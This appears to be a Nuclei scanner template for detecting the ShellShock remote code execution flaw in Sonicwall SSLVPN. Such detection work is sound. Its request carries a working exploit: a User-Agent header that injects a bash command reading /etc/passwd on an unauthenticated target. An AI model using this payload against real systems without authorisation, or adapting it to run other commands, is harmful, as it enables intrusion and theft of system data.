id: sonicwall-sslvpn-shellshock

info:
  name: Sonicwall SSLVPN - Remote Code Execution (ShellShock)
  author: PR3R00T
  severity: critical
  description: |
    Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
  reference:
    - https://twitter.com/chybeta/status/1353974652540882944
    - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: shellshock,sonicwall,rce,vpn

http:
  - raw:
      - |
        GET /cgi-bin/jarrewrite.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ec83d300f9a59fc11765266702b602eaae4d835722e91762ead49bb65a38315902205a2dceefbb3d41792d8ede6abf98860a3cb61efd40aa6d981703bf76777360dc:922c64590222798bb761d5b6d8e72950